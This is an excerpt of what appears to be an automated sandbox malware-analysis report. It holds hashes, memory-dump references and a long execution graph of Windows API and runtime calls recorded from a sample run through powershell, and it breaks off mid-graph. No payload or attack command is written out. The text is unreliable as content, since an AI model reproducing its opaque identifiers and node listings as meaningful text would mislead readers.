                                                                              • Instruction Fuzzy Hash: AFF08133F6D95D5BEB20A5A8BC205D87FD2EFC8358F05007AE41CC71A1E7265945C341

                                                                              Non-executed Functions

                                                                              Function 00007FFD9B9289FA Relevance: 7.6, Strings: 6, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M_^8$M_^I$M_^J$M_^K$M_^N$M_^Y
                                                                              • API String ID: 0-1632920121
                                                                              • Opcode ID: 23b918e06b9512168264ecf502b2f7b2da0e678b6be169f6863bdbf4ae9d6be0
                                                                              • Instruction ID: f12ba661203e3dd70f8a13172f13c4603ebda20fcf1b4d7ba6d019e14c6f69f4
                                                                              • Opcode Fuzzy Hash: 23b918e06b9512168264ecf502b2f7b2da0e678b6be169f6863bdbf4ae9d6be0
                                                                              • Instruction Fuzzy Hash: 82213B73718026C6D20537AC78529D9B781EF9033479983F6D16ACA183ED2A60CB46C4

                                                                              Execution Graph

                                                                              Execution Coverage:7.5%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:14.2%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:89
                                                                              execution_graph 52705 11108070 52706 1110807c 52705->52706 52712 1110809f 52706->52712 52714 11145c70 52706->52714 52709 111080b3 52710 11108091 52710->52712 52739 11107050 52710->52739 52713 111080a8 52712->52713 52781 11106e70 GetTickCount EnterCriticalSection GetTickCount 52712->52781 52715 11145c91 GetVersionExA 52714->52715 52723 11145e6c 52714->52723 52716 11145cb3 52715->52716 52715->52723 52717 11145cc0 RegOpenKeyExA 52716->52717 52716->52723 52718 11145ced _memset 52717->52718 52717->52723 52818 11143bd0 RegQueryValueExA 52718->52818 52719 11145e75 52719->52710 52722 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 52724 11145d59 52722->52724 52723->52719 52824 11081f20 52723->52824 52726 11145e5f RegCloseKey 52724->52726 52820 11163ca7 52724->52820 52726->52723 52727 11145ebc 52727->52719 52729 11163ca7 std::locale::facet::_Facet_Register 55 API calls 52727->52729 52729->52719 52730 11145d6e 52731 11163ca7 std::locale::facet::_Facet_Register 55 API calls 52730->52731 52732 11145da2 52731->52732 52733 11145db0 _strncpy 52732->52733 52734 11145e41 52732->52734 52733->52734 52735 11145ddb 52733->52735 52734->52726 52735->52734 52736 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 52735->52736 52737 11145e18 52736->52737 52738 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 52737->52738 52738->52734 52965 11164040 52739->52965 52741 1110706b LoadLibraryA 52976 11138260 215 API calls 52741->52976 52743 111070d1 52744 111070d5 52743->52744 52745 111070ed 52743->52745 52744->52745 52746 111070da 52744->52746 52747 11145c70 std::locale::facet::_Facet_Register 72 API calls 52745->52747 52748 111070de FreeLibrary 52746->52748 52753 111070e5 52746->52753 52749 111070f6 52747->52749 52748->52753 52750 11107111 LoadLibraryA GetProcAddress 52749->52750 52751 11107107 52749->52751 52752 1110728a SetLastError 52750->52752 52757 111071b0 52750->52757 52751->52750 52754 111071dc GetProcAddress 52752->52754 52753->52712 52755 111072a1 SetLastError 52754->52755 52756 11107201 52754->52756 52762 1110746f 52755->52762 52756->52762 52768 1110725e GetProcAddress 52756->52768 52770 111072c9 OpenProcess 52756->52770 52778 1110727a 52756->52778 52966 110262f0 52756->52966 52757->52754 52759 11106e70 216 API calls 52757->52759 52758 11145c70 std::locale::facet::_Facet_Register 72 API calls 52760 111074aa 52758->52760 52761 111071c7 52759->52761 52764 111074c5 FreeLibrary 52760->52764 52765 111074ce 52760->52765 52977 110f62e0 20 API calls std::locale::facet::_Facet_Register 52761->52977 52762->52758 52764->52765 52765->52753 52767 111074d2 FreeLibrary 52765->52767 52766 111071d1 52766->52754 52767->52753 52769 111072ae SetLastError 52768->52769 52768->52778 52769->52756 52770->52756 52770->52778 52772 11107445 CloseHandle 52772->52762 52772->52778 52774 11107356 OpenProcessToken 52774->52772 52774->52778 52775 1110737c GetTokenInformation 52776 11107438 CloseHandle 52775->52776 52775->52778 52776->52772 52777 11106e70 216 API calls 52777->52778 52778->52756 52778->52762 52778->52770 52778->52772 52778->52774 52778->52775 52778->52776 52778->52777 52780 11081e70 66 API calls 52778->52780 52978 11081e00 52778->52978 52982 110f62e0 20 API calls std::locale::facet::_Facet_Register 52778->52982 52780->52778 52782 11106ec3 52781->52782 52783 11106eb8 52781->52783 52785 11106ee2 52782->52785 52786 11106f3a GetTickCount LeaveCriticalSection 52782->52786 52992 11147060 52783->52992 52787 11106f00 GetTickCount LeaveCriticalSection 52785->52787 52998 11029a70 198 API calls 2 library calls 52785->52998 52788 11106f60 EnterCriticalSection 52786->52788 52789 11106f52 52786->52789 52791 11106f18 52787->52791 52799 11106f23 52787->52799 52794 11106f89 52788->52794 52792 11147060 std::locale::facet::_Facet_Register 16 API calls 52789->52792 52796 11147060 std::locale::facet::_Facet_Register 16 API calls 52791->52796 52793 11106f5d 52792->52793 52793->52788 52797 11106f93 52794->52797 52798 11106fb4 52794->52798 52796->52799 52800 1110702e LeaveCriticalSection 52797->52800 52801 11106f9e 52797->52801 52984 111101b0 52798->52984 52799->52709 52800->52709 52999 11029a70 198 API calls 2 library calls 52801->52999 52804 11106fbe 52806 11106fd7 52804->52806 53000 110f1080 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 52804->53000 52809 11106fe4 52806->52809 52810 11106ffb 52806->52810 52807 1110702b 52807->52800 53001 11029a70 198 API calls 2 library calls 52809->53001 53002 1108a2e0 203 API calls 3 library calls 52810->53002 52814 11107010 53003 11149b20 46 API calls std::ios_base::_Ios_base_dtor 52814->53003 52816 1110701f 52817 11147060 std::locale::facet::_Facet_Register 16 API calls 52816->52817 52817->52807 52819 11143bfa 52818->52819 52819->52722 52821 11163c91 52820->52821 52834 1116450b 52821->52834 52825 11081f2d 52824->52825 52826 11081f32 52824->52826 52963 11081c50 IsDBCSLeadByte 52825->52963 52828 11081f3b 52826->52828 52833 11081f53 52826->52833 52964 11164644 64 API calls 2 library calls 52828->52964 52829 11081f59 52829->52727 52831 11081f4c 52831->52727 52832 11166654 64 API calls std::locale::facet::_Facet_Register 52832->52833 52833->52829 52833->52832 52835 11164524 52834->52835 52838 111642e0 52835->52838 52837 11163ca2 52837->52730 52848 11164259 52838->52848 52840 11164304 52856 1116a1af 43 API calls __getptd_noexit 52840->52856 52843 11164309 52843->52837 52845 1116433a 52846 11164381 52845->52846 52857 11171a63 55 API calls _LocaleUpdate::_LocaleUpdate 52845->52857 52846->52843 52858 1116a1af 43 API calls __getptd_noexit 52846->52858 52849 1116426c 52848->52849 52855 111642b9 52848->52855 52859 1116c675 52849->52859 52852 11164299 52852->52855 52879 111715a2 45 API calls 6 library calls 52852->52879 52855->52840 52855->52845 52856->52843 52857->52845 52858->52843 52880 1116c5fc GetLastError 52859->52880 52861 1116c67d 52862 11164271 52861->52862 52894 1116e66a 43 API calls 2 library calls 52861->52894 52862->52852 52864 11171306 52862->52864 52865 11171312 _fgetc 52864->52865 52866 1116c675 __getptd 43 API calls 52865->52866 52867 11171317 52866->52867 52868 11171345 52867->52868 52870 11171329 52867->52870 52924 1117459f 52868->52924 52872 1116c675 __getptd 43 API calls 52870->52872 52871 1117134c 52931 111712b9 51 API calls 3 library calls 52871->52931 52874 1117132e 52872->52874 52877 1117133c _fgetc 52874->52877 52923 1116e66a 43 API calls 2 library calls 52874->52923 52875 11171360 52932 11171373 LeaveCriticalSection _doexit 52875->52932 52877->52852 52879->52855 52895 1116c4ba TlsGetValue 52880->52895 52883 1116c669 SetLastError 52883->52861 52886 1116c62f DecodePointer 52887 1116c644 52886->52887 52888 1116c660 52887->52888 52889 1116c648 52887->52889 52905 11163aa5 52888->52905 52904 1116c548 43 API calls 4 library calls 52889->52904 52892 1116c650 GetCurrentThreadId 52892->52883 52893 1116c666 52893->52883 52896 1116c4cf DecodePointer TlsSetValue 52895->52896 52897 1116c4ea 52895->52897 52896->52897 52897->52883 52898 1116ac7e 52897->52898 52899 1116ac87 52898->52899 52901 1116acc4 52899->52901 52902 1116aca5 Sleep 52899->52902 52911 11170fc4 52899->52911 52901->52883 52901->52886 52903 1116acba 52902->52903 52903->52899 52903->52901 52904->52892 52906 11163ab0 HeapFree 52905->52906 52907 11163ad9 _free 52905->52907 52906->52907 52908 11163ac5 52906->52908 52907->52893 52922 1116a1af 43 API calls __getptd_noexit 52908->52922 52910 11163acb GetLastError 52910->52907 52912 11170fd0 52911->52912 52914 11170feb 52911->52914 52913 11170fdc 52912->52913 52912->52914 52920 1116a1af 43 API calls __getptd_noexit 52913->52920 52916 11170ffe RtlAllocateHeap 52914->52916 52918 11171025 52914->52918 52921 1116e368 DecodePointer 52914->52921 52916->52914 52916->52918 52917 11170fe1 52917->52899 52918->52899 52920->52917 52921->52914 52922->52910 52925 111745c7 EnterCriticalSection 52924->52925 52926 111745b4 52924->52926 52925->52871 52933 111744dd 52926->52933 52928 111745ba 52928->52925 52957 1116e66a 43 API calls 2 library calls 52928->52957 52931->52875 52932->52874 52934 111744e9 _fgetc 52933->52934 52935 11174511 52934->52935 52936 111744f9 __FF_MSGBANNER 52934->52936 52938 11174523 __malloc_crt 52935->52938 52945 1117451f _fgetc 52935->52945 52958 1116e6ae 43 API calls 2 library calls 52936->52958 52940 11174531 52938->52940 52941 11174540 52938->52941 52939 11174505 52959 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 52939->52959 52960 1116a1af 43 API calls __getptd_noexit 52940->52960 52942 1117459f __lock 40 API calls 52941->52942 52946 11174547 52942->52946 52945->52928 52948 1117454f InitializeCriticalSectionAndSpinCount 52946->52948 52949 1117457a 52946->52949 52950 1117456b 52948->52950 52951 1117455f 52948->52951 52952 11163aa5 _free 40 API calls 52949->52952 52962 11174596 LeaveCriticalSection _doexit 52950->52962 52953 11163aa5 _free 40 API calls 52951->52953 52952->52950 52954 11174565 52953->52954 52961 1116a1af 43 API calls __getptd_noexit 52954->52961 52958->52939 52960->52945 52961->52950 52962->52945 52963->52826 52964->52831 52965->52741 52967 110262fe GetProcAddress 52966->52967 52968 1102630f 52966->52968 52967->52968 52969 11026328 52968->52969 52970 1102631c K32GetProcessImageFileNameA 52968->52970 52972 1102632e GetProcAddress 52969->52972 52973 1102633f 52969->52973 52970->52969 52971 11026361 52970->52971 52971->52778 52972->52973 52974 11026346 52973->52974 52975 11026357 SetLastError 52973->52975 52974->52778 52975->52971 52976->52743 52977->52766 52980 11081e13 _strrchr 52978->52980 52979 11081e2a std::locale::facet::_Facet_Register 52979->52778 52980->52979 52983 11081c50 IsDBCSLeadByte 52980->52983 52982->52778 52983->52979 53004 11163a11 52984->53004 52987 11110203 _memset 52990 1111021d 52987->52990 52988 111101d7 wsprintfA 53021 11029a70 198 API calls 2 library calls 52988->53021 52990->52804 52993 11147071 52992->52993 52994 1114706c 52992->52994 53029 111464c0 52993->53029 53032 11146270 13 API calls std::locale::facet::_Facet_Register 52994->53032 53000->52806 53002->52814 53003->52816 53005 11163a8e 53004->53005 53010 11163a1f 53004->53010 53027 1116e368 DecodePointer 53005->53027 53007 11163a2a __FF_MSGBANNER 53022 1116e6ae 43 API calls 2 library calls 53007->53022 53008 11163a94 53028 1116a1af 43 API calls __getptd_noexit 53008->53028 53010->53007 53012 11163a4d RtlAllocateHeap 53010->53012 53015 11163a7a 53010->53015 53019 11163a78 53010->53019 53024 1116e368 DecodePointer 53010->53024 53012->53010 53013 111101ce 53012->53013 53013->52987 53013->52988 53025 1116a1af 43 API calls __getptd_noexit 53015->53025 53016 11163a36 53016->53010 53023 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 53016->53023 53026 1116a1af 43 API calls __getptd_noexit 53019->53026 53022->53016 53024->53010 53025->53019 53026->53013 53027->53008 53028->53013 53033 11146370 53029->53033 53031 111464d2 53031->52782 53032->52993 53034 11146394 53033->53034 53035 11146399 53033->53035 53043 11146270 13 API calls std::locale::facet::_Facet_Register 53034->53043 53037 1114640f wsprintfA 53035->53037 53038 111463a2 53035->53038 53039 11146432 53037->53039 53038->53031 53039->53039 53040 11146439 wvsprintfA 53039->53040 53041 11146454 OutputDebugStringA 53040->53041 53041->53038 53043->53035 53044 110179e0 GetTickCount 53051 110178f0 53044->53051 53046 110179f8 53060 11017810 53046->53060 53048 11017a01 SetEvent GetTickCount 53049 11147060 std::locale::facet::_Facet_Register 16 API calls 53048->53049 53050 11017a27 53049->53050 53052 11017910 53051->53052 53055 110179c6 53051->53055 53053 11017932 CoInitialize _GetRawWMIStringW 53052->53053 53054 11017929 WaitForSingleObject 53052->53054 53057 110179b2 53053->53057 53059 11017965 53053->53059 53054->53053 53055->53046 53056 110179c0 CoUninitialize 53056->53055 53057->53055 53057->53056 53059->53057 53069 111646f7 44 API calls __fassign 53059->53069 53061 11017830 53060->53061 53062 110178d6 53060->53062 53063 11017848 CoInitialize _GetRawWMIStringW 53061->53063 53065 1101783f WaitForSingleObject 53061->53065 53062->53048 53064 110178c2 53063->53064 53068 1101787b 53063->53068 53064->53062 53066 110178d0 CoUninitialize 53064->53066 53065->53063 53066->53062 53068->53064 53070 111646f7 44 API calls __fassign 53068->53070 53069->53057 53070->53064 53071 110262c0 LoadLibraryA 53072 11031780 53073 1103178e 53072->53073 53074 1103179f SetUnhandledExceptionFilter 53073->53074 53075 110317af std::locale::facet::_Facet_Register 53074->53075 53076 11041180 53077 110411b2 53076->53077 53078 110411d4 53077->53078 53079 110411b8 53077->53079 53080 110412e8 53078->53080 53083 1104120d 53078->53083 53093 110881d0 243 API calls 3 library calls 53078->53093 53081 110fb470 10 API calls 53079->53081 53082 110411ca CloseHandle 53081->53082 53082->53078 53083->53080 53089 110fb470 GetTokenInformation 53083->53089 53086 1104127a 53087 11041282 CloseHandle 53086->53087 53088 11041289 53086->53088 53087->53088 53090 110fb4b8 53089->53090 53092 110fb4a7 53089->53092 53094 110f2300 9 API calls 53090->53094 53092->53086 53093->53083 53094->53092 53095 11144dd0 53096 11144de1 53095->53096 53104 111447f0 53096->53104 53100 11144e2b 53101 11144e32 ResetEvent 53100->53101 53103 11144e46 SetEvent WaitForMultipleObjects 53100->53103 53101->53100 53102 11144e64 53103->53101 53103->53102 53105 111447fc GetCurrentProcess 53104->53105 53106 1114481f 53104->53106 53105->53106 53107 1114480d GetModuleFileNameA 53105->53107 53108 111101b0 std::locale::facet::_Facet_Register 200 API calls 53106->53108 53110 11144849 WaitForMultipleObjects 53106->53110 53107->53106 53109 1114483b 53108->53109 53109->53110 53112 11144140 GetModuleFileNameA 53109->53112 53110->53100 53110->53102 53113 111441c3 53112->53113 53114 11144183 53112->53114 53116 111441cf LoadLibraryA 53113->53116 53117 111441e9 GetModuleHandleA GetProcAddress 53113->53117 53115 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 53114->53115 53118 11144191 53115->53118 53116->53117 53119 111441de LoadLibraryA 53116->53119 53120 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 53117->53120 53121 11144209 53117->53121 53118->53113 53122 11144198 LoadLibraryA 53118->53122 53119->53117 53123 11144243 10 API calls 53120->53123 53121->53123 53122->53113 53124 111442c0 53123->53124 53124->53110 53125 110886c0 _memset InitializeCriticalSection 53128 11088530 53125->53128 53141 11146710 53128->53141 53130 11088668 53131 11088563 53131->53130 53131->53131 53132 111101b0 std::locale::facet::_Facet_Register 200 API calls 53131->53132 53133 110885b9 53132->53133 53134 110885fd 53133->53134 53135 110885e6 53133->53135 53146 110869d0 53134->53146 53168 11029a70 198 API calls 2 library calls 53135->53168 53139 11146710 204 API calls 53140 11088608 53139->53140 53140->53130 53140->53139 53140->53140 53169 111103d0 53141->53169 53143 1114671f 53175 11145660 53143->53175 53145 1114672e 53145->53131 53147 110869eb 53146->53147 53148 110869ef 53147->53148 53187 111457a0 53147->53187 53148->53140 53150 11086a07 53150->53150 53151 11086a2b LoadLibraryA 53150->53151 53152 11086ac9 GetProcAddress 53151->53152 53153 11086a64 53151->53153 53156 11086b6c 53152->53156 53157 11086ae4 GetProcAddress 53152->53157 53154 11086a6d GetModuleFileNameA 53153->53154 53155 11086ac0 53153->53155 53158 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 53154->53158 53155->53152 53155->53156 53156->53140 53157->53156 53159 11086af5 GetProcAddress 53157->53159 53160 11086a8e LoadLibraryA 53158->53160 53159->53156 53161 11086b06 GetProcAddress 53159->53161 53160->53155 53161->53156 53162 11086b17 GetProcAddress 53161->53162 53162->53156 53163 11086b28 GetProcAddress 53162->53163 53163->53156 53164 11086b39 GetProcAddress 53163->53164 53164->53156 53165 11086b4a GetProcAddress 53164->53165 53165->53156 53166 11086b5b GetProcAddress 53165->53166 53166->53156 53167 11086b7e 53166->53167 53167->53140 53170 111103e7 EnterCriticalSection 53169->53170 53171 111103de GetCurrentThreadId 53169->53171 53172 111103fe ___DllMainCRTStartup 53170->53172 53171->53170 53173 11110405 LeaveCriticalSection 53172->53173 53174 11110418 LeaveCriticalSection 53172->53174 53173->53143 53174->53143 53184 110963b0 53175->53184 53178 11145684 wsprintfA 53179 11145697 53178->53179 53180 1114569b 53179->53180 53183 111456b2 53179->53183 53186 11029a70 198 API calls 2 library calls 53180->53186 53183->53145 53185 110963b9 LoadStringA 53184->53185 53185->53178 53185->53179 53188 111457c2 53187->53188 53191 111457d9 std::locale::facet::_Facet_Register 53187->53191 53226 11029a70 198 API calls 2 library calls 53188->53226 53192 1114580c GetModuleFileNameA 53191->53192 53193 11145918 53191->53193 53194 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 53192->53194 53193->53150 53195 11145821 53194->53195 53195->53193 53196 11145831 SHGetFolderPathA 53195->53196 53197 1114585e 53196->53197 53198 1114587d SHGetFolderPathA 53196->53198 53197->53198 53200 11145864 53197->53200 53201 111458b2 std::locale::facet::_Facet_Register 53198->53201 53227 11029a70 198 API calls 2 library calls 53200->53227 53207 1102ad70 53201->53207 53228 11028c10 53207->53228 53209 1102ad7e 53210 11145240 53209->53210 53211 111452ca 53210->53211 53212 1114524b 53210->53212 53211->53193 53212->53211 53213 1114525b GetFileAttributesA 53212->53213 53214 11145275 __strdup 53213->53214 53215 11145267 53213->53215 53216 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 53214->53216 53215->53193 53217 11145286 53216->53217 53218 11145240 std::locale::facet::_Facet_Register 44 API calls 53217->53218 53224 111452a3 53217->53224 53219 11145296 53218->53219 53220 111452ac 53219->53220 53221 1114529e 53219->53221 53223 11163aa5 _free 43 API calls 53220->53223 53222 11163aa5 _free 43 API calls 53221->53222 53222->53224 53225 111452b1 CreateDirectoryA 53223->53225 53224->53193 53225->53224 53229 11028c33 53228->53229 53233 1102927b 53228->53233 53230 11028cf0 GetModuleFileNameA 53229->53230 53234 11028c68 53229->53234 53231 11028d11 _strrchr 53230->53231 53242 11164ead 53231->53242 53233->53209 53235 11164ead std::locale::facet::_Facet_Register 111 API calls 53234->53235 53236 11028ceb 53235->53236 53236->53233 53237 11163ca7 std::locale::facet::_Facet_Register 55 API calls 53236->53237 53239 110291e5 53236->53239 53240 11028d75 __mbschr_l 53237->53240 53239->53239 53245 11164c77 53239->53245 53240->53239 53241 1116558e 64 API calls _CountryEnumProc@4 53240->53241 53241->53240 53254 11164df1 53242->53254 53244 11164ebf 53244->53236 53246 11164c83 _fgetc 53245->53246 53247 11164c95 53246->53247 53248 11164caa 53246->53248 53348 1116a1af 43 API calls __getptd_noexit 53247->53348 53253 11164c9a _fgetc 53248->53253 53328 1116be59 53248->53328 53253->53233 53257 11164dfd _fgetc 53254->53257 53255 11164e10 53302 1116a1af 43 API calls __getptd_noexit 53255->53302 53257->53255 53258 11164e3d 53257->53258 53269 11172558 53258->53269 53260 11164e42 53261 11164e56 53260->53261 53262 11164e49 53260->53262 53264 11164e7d 53261->53264 53265 11164e5d 53261->53265 53303 1116a1af 43 API calls __getptd_noexit 53262->53303 53284 111722c1 53264->53284 53304 1116a1af 43 API calls __getptd_noexit 53265->53304 53268 11164e15 _fgetc @_EH4_CallFilterFunc@8 53268->53244 53270 11172564 _fgetc 53269->53270 53271 1117459f __lock 43 API calls 53270->53271 53279 11172572 53271->53279 53272 111725ee __malloc_crt 53273 11172603 InitializeCriticalSectionAndSpinCount 53272->53273 53282 111725e7 53272->53282 53275 11172636 EnterCriticalSection 53273->53275 53276 11172623 53273->53276 53275->53282 53278 11163aa5 _free 43 API calls 53276->53278 53277 11172677 _fgetc 53277->53260 53278->53282 53279->53272 53280 111744dd __mtinitlocknum 43 API calls 53279->53280 53279->53282 53308 1116be9a 44 API calls __lock 53279->53308 53309 1116bf08 LeaveCriticalSection LeaveCriticalSection _doexit 53279->53309 53280->53279 53305 11172682 53282->53305 53285 111722e3 53284->53285 53286 111722f7 53285->53286 53293 1117230e 53285->53293 53314 1116a1af 43 API calls __getptd_noexit 53286->53314 53288 11172511 53311 1117a5c3 53288->53311 53289 111724ff 53318 1116a1af 43 API calls __getptd_noexit 53289->53318 53292 111722fc 53292->53268 53293->53289 53294 1117246d __fassign 53293->53294 53301 111724ab 53293->53301 53294->53289 53295 11172481 53294->53295 53295->53289 53315 1117a7e7 64 API calls __mbsnbicmp_l 53295->53315 53297 111724a4 53297->53301 53316 1117a7e7 64 API calls __mbsnbicmp_l 53297->53316 53299 111724c3 53299->53301 53317 1117a7e7 64 API calls __mbsnbicmp_l 53299->53317 53301->53288 53301->53289 53302->53268 53303->53268 53304->53268 53310 111744c6 LeaveCriticalSection 53305->53310 53307 11172689 53307->53277 53308->53279 53309->53279 53310->53307 53319 1117a4ff 53311->53319 53313 1117a5de 53313->53292 53314->53292 53315->53297 53316->53299 53317->53301 53318->53292 53322 1117a50b _fgetc 53319->53322 53320 1117a51e 53321 1116a1af _fgetc 43 API calls 53320->53321 53327 1117a523 _fgetc 53321->53327 53322->53320 53323 1117a554 53322->53323 53324 11179dcb __tsopen_nolock 84 API calls 53323->53324 53325 1117a56e 53324->53325 53326 1117a595 __wsopen_helper LeaveCriticalSection 53325->53326 53326->53327 53327->53313 53329 1116be8d EnterCriticalSection 53328->53329 53330 1116be6b 53328->53330 53332 11164cc3 53329->53332 53330->53329 53331 1116be73 53330->53331 53333 1117459f __lock 43 API calls 53331->53333 53334 11164c0a 53332->53334 53333->53332 53335 11164c2f 53334->53335 53336 11164c1b 53334->53336 53338 11164c20 53335->53338 53349 1116bf37 53335->53349 53385 1116a1af 43 API calls __getptd_noexit 53336->53385 53338->53253 53344 11164c49 53364 11171e64 53344->53364 53346 11164c4f 53346->53338 53347 11163aa5 _free 43 API calls 53346->53347 53347->53338 53348->53253 53350 1116bf50 53349->53350 53354 11164c3b 53349->53354 53351 1116a147 _fgetc 43 API calls 53350->53351 53350->53354 53352 1116bf6b 53351->53352 53386 111730a4 47 API calls 4 library calls 53352->53386 53355 11171f28 53354->53355 53356 11164c43 53355->53356 53357 11171f38 53355->53357 53359 1116a147 53356->53359 53357->53356 53358 11163aa5 _free 43 API calls 53357->53358 53358->53356 53360 1116a153 53359->53360 53361 1116a168 53359->53361 53387 1116a1af 43 API calls __getptd_noexit 53360->53387 53361->53344 53363 1116a158 53363->53344 53365 11171e70 _fgetc 53364->53365 53366 11171e93 53365->53366 53367 11171e78 53365->53367 53368 11171e9f 53366->53368 53374 11171ed9 53366->53374 53413 1116a1c2 43 API calls __getptd_noexit 53367->53413 53415 1116a1c2 43 API calls __getptd_noexit 53368->53415 53370 11171e7d 53414 1116a1af 43 API calls __getptd_noexit 53370->53414 53373 11171ea4 53416 1116a1af 43 API calls __getptd_noexit 53373->53416 53388 111778c4 53374->53388 53377 11171edf 53378 11171eed 53377->53378 53379 11171ef9 53377->53379 53398 11171dc8 53378->53398 53417 1116a1af 43 API calls __getptd_noexit 53379->53417 53382 11171e85 _fgetc 53382->53346 53383 11171ef3 53418 11171f20 LeaveCriticalSection __unlock_fhandle 53383->53418 53385->53338 53386->53354 53387->53363 53389 111778d0 _fgetc 53388->53389 53390 1117792a 53389->53390 53393 1117459f __lock 43 API calls 53389->53393 53391 1117792f EnterCriticalSection 53390->53391 53392 1117794c _fgetc 53390->53392 53391->53392 53392->53377 53394 111778fc 53393->53394 53395 11177905 InitializeCriticalSectionAndSpinCount 53394->53395 53396 11177918 53394->53396 53395->53396 53419 1117795a LeaveCriticalSection _doexit 53396->53419 53420 1117785b 53398->53420 53400 11171e2e 53431 111777d5 44 API calls 2 library calls 53400->53431 53401 11171dd8 53401->53400 53403 1117785b __lseeki64_nolock 43 API calls 53401->53403 53412 11171e0c 53401->53412 53406 11171e03 53403->53406 53404 1117785b __lseeki64_nolock 43 API calls 53407 11171e18 FindCloseChangeNotification 53404->53407 53405 11171e36 53409 1117785b __lseeki64_nolock 43 API calls 53406->53409 53407->53400 53409->53412 53412->53400 53412->53404 53413->53370 53414->53382 53415->53373 53416->53382 53417->53383 53418->53382 53419->53390 53421 11177868 53420->53421 53424 11177880 53420->53424 53422 1116a1c2 __read 43 API calls 53421->53422 53423 1117786d 53422->53423 53426 1116a1af _fgetc 43 API calls 53423->53426 53425 1116a1c2 __read 43 API calls 53424->53425 53428 111778bf 53424->53428 53427 11177891 53425->53427 53430 11177875 53426->53430 53429 1116a1af _fgetc 43 API calls 53427->53429 53428->53401 53429->53430 53430->53401 53431->53405 53433 11174898 53434 1116c675 __getptd 43 API calls 53433->53434 53435 111748b5 _LcidFromHexString 53434->53435 53436 111748c2 GetLocaleInfoA 53435->53436 53437 111748f5 53436->53437 53451 111748e9 53436->53451 53459 1116558e 64 API calls 2 library calls 53437->53459 53439 11174901 53440 1117490b GetLocaleInfoA 53439->53440 53447 1117493b _CountryEnumProc@4 53439->53447 53441 1117492a 53440->53441 53440->53451 53460 1116558e 64 API calls 2 library calls 53441->53460 53442 111749ae GetLocaleInfoA 53444 111749d1 53442->53444 53442->53451 53462 1116558e 64 API calls 2 library calls 53444->53462 53446 111749dc 53448 11174a14 53446->53448 53449 111749e4 53446->53449 53447->53442 53447->53451 53448->53451 53463 1116558e 64 API calls 2 library calls 53448->53463 53449->53451 53453 11174a02 _strlen 53449->53453 53450 11174935 53450->53447 53461 11164644 64 API calls 2 library calls 53450->53461 53453->53451 53455 11174a0f 53453->53455 53454 11174960 53454->53447 53457 11174967 _strlen 53454->53457 53455->53451 53458 11174a31 _TestDefaultLanguage 53455->53458 53457->53447 53458->53451 53459->53439 53460->53450 53461->53454 53462->53446 53463->53455 53464 11030ef3 RegOpenKeyExA 53465 11030f20 53464->53465 53466 1103103d 53464->53466 53467 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 53465->53467 53468 11031061 53466->53468 53470 11031145 53466->53470 53469 11030f4a 53467->53469 53473 111101b0 std::locale::facet::_Facet_Register 200 API calls 53468->53473 53471 11031030 RegCloseKey 53469->53471 53474 11163ca7 std::locale::facet::_Facet_Register 55 API calls 53469->53474 53472 111101b0 std::locale::facet::_Facet_Register 200 API calls 53470->53472 53471->53466 53476 11031088 53472->53476 53473->53476 53475 11030f5e 53474->53475 53478 11163ca7 std::locale::facet::_Facet_Register 55 API calls 53475->53478 53477 110312db GetStockObject GetObjectA 53476->53477 53479 1103130a SetErrorMode SetErrorMode 53477->53479 53482 11030f92 53478->53482 53481 111101b0 std::locale::facet::_Facet_Register 200 API calls 53479->53481 53484 11031346 53481->53484 53482->53471 53483 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 53482->53483 53485 11030fe8 53483->53485 53487 111101b0 std::locale::facet::_Facet_Register 200 API calls 53484->53487 53486 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 53485->53486 53488 11031011 53486->53488 53489 11031386 53487->53489 53488->53471 53490 110313a3 InterlockedExchange 53489->53490 53491 111101b0 std::locale::facet::_Facet_Register 200 API calls 53490->53491 53492 110313c7 53491->53492 53493 110313e3 GetACP 53492->53493 53526 11163f93 53493->53526 53495 11031406 53535 111663a3 53495->53535 53497 11031410 53569 11143780 53497->53569 53500 111101b0 std::locale::facet::_Facet_Register 200 API calls 53501 1103145c 53500->53501 53575 11061aa0 53501->53575 53503 110314d4 53507 111101b0 std::locale::facet::_Facet_Register 200 API calls 53503->53507 53505 111101b0 std::locale::facet::_Facet_Register 200 API calls 53506 110314ae 53505->53506 53626 11061710 53506->53626 53509 11031501 53507->53509 53592 11125d40 53509->53592 53511 11031523 53512 111101b0 std::locale::facet::_Facet_Register 200 API calls 53511->53512 53513 1103155b 53512->53513 53514 111101b0 std::locale::facet::_Facet_Register 200 API calls 53513->53514 53515 1103158a 53514->53515 53601 1105d1a0 53515->53601 53517 110315d4 53608 11027810 53517->53608 53527 11163fc6 53526->53527 53528 11163fb1 53526->53528 53527->53528 53529 11163fcd 53527->53529 53639 1116a1af 43 API calls __getptd_noexit 53528->53639 53640 1117027b 70 API calls 6 library calls 53529->53640 53532 11163ff3 53533 11163fb6 53532->53533 53641 111700e4 50 API calls 5 library calls 53532->53641 53533->53495 53536 111663af _fgetc 53535->53536 53537 111663d0 53536->53537 53538 111663b9 53536->53538 53540 1116c675 __getptd 43 API calls 53537->53540 53665 1116a1af 43 API calls __getptd_noexit 53538->53665 53541 111663d5 53540->53541 53542 11171306 _setlocale 51 API calls 53541->53542 53543 111663df 53542->53543 53544 1116ac7e __calloc_crt 43 API calls 53543->53544 53545 111663f5 53544->53545 53546 